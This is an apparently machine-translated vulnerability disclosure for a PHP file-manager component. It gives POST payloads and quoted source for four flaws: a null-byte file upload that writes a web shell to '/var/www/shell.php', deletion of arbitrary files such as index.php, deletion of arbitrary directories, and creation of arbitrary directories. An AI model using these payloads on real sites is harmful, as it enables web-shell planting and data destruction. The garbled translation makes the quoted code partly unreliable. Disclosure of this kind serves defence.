Vulnerability 1 Arbitrary File Upload [magic_quotes_gpc = Off]
Vulnerability file: assetmanager. php
POST inpCurrFolder2 =/var/www/shell. php % 00
Vulnerability code: 42nd lines
If (isset ($ _ FILES ["File1"])
{
If (isset ($ _ POST ["inpCurrFolder2"]) $ currFolder =$ _ POST [inpCurrFolder2]; // any file can be written when magic_quotes_gpc = off can be constructed in the directory.
If (isset ($ _ REQUEST ["inpFilter"]) $ ffilter = $ _ REQUEST ["inpFilter"];
If ($ MaxFileSize & ($ _ FILES [File1] [size]> $ MaxFileSize ))
{
$ SMsg = "The file exceeds the maximum size allowed .";
}
Else if (! IsTypeAllowed ($ _ FILES [File1] [name])
{
$ SMsg = "The File Type is not allowed .";
}
Else if (move_uploaded_file ($ _ FILES [File1] [tmp_name], $ currFolder. "/". basename ($ _ FILES [File1] [name])
{
$ SMsg = "";
$ SUploadedFile =$ _ FILES [File1] [name];
@ Chmod ($ currFolder. "/". basename ($ _ FILES [File1] [name]), 0644 );
}
Else
{
$ SMsg = "Upload failed .";
}
}
-------------------
2. The access permission is not set, causing any file deletion.
Vulnerability file: assetmanager. php
[POST] inpFileToDelete =/var/www/index. php
Vulnerability code: 72nd lines
If (isset ($ _ POST ["inpFileToDelete"])
{
$ Filename = pathinfo ($ _ POST ["inpFileToDelete"]);
$ Filename = $ filename [basename];
If ($ filename! = "")
Unlink ($ currFolder. "/". $ filename );
$ SMsg = "";
}
-------------------
3. arbitrary directory deletion vulnerability caused by unconfigured Access Permissions
Vulnerability file: folderdel _. php
[POST] inpCurrFolder =/var/www/upload/
Vulnerability code: 3rd lines
If (isset ($ _ POST ["inpCurrFolder"])
{
$ SDestination = pathinfo ($ _ POST ["inpCurrFolder"]);
// DELETE ALL FILES IF FOLDER NOT EMPTY
$ Dir = $ _ POST ["inpCurrFolder"];
$ Handle = opendir ($ dir );
While ($ file = readdir ($ handle) if ($ file! = "." & $ File! = "..") Unlink ($ dir. "/". $ file );
Closedir ($ handle );
If (rmdir ($ _ POST ["inpCurrFolder"]) = 0)
$ SMsg = "";
Else
$ SMsg = "<script> document. write (getTxt (Folder deleted.) </script> ";
}
-------------------
4. Any directory is created because the access permission is not set.
Vulnerability file: foldernew. php
[POST] inpCurrFolder =/var/www/& inpNewFolderName = 123
Vulnerability code: 3rd lines
If (isset ($ _ POST ["inpNewFolderName"])
{
$ SFolder = $ _ POST ["inpCurrFolder"]. "/". $ _ POST ["inpNewFolderName"];
If (is_dir ($ sFolder) = 1)
{// Folder already exist
$ SMsg = "<script> document. write (getTxt (Folder already exists.) </script> ";
}
Else
{
// If (mkdir ($ sFolder ))
If (mkdir ($ sFolder, 0755 ))
From: Love Letter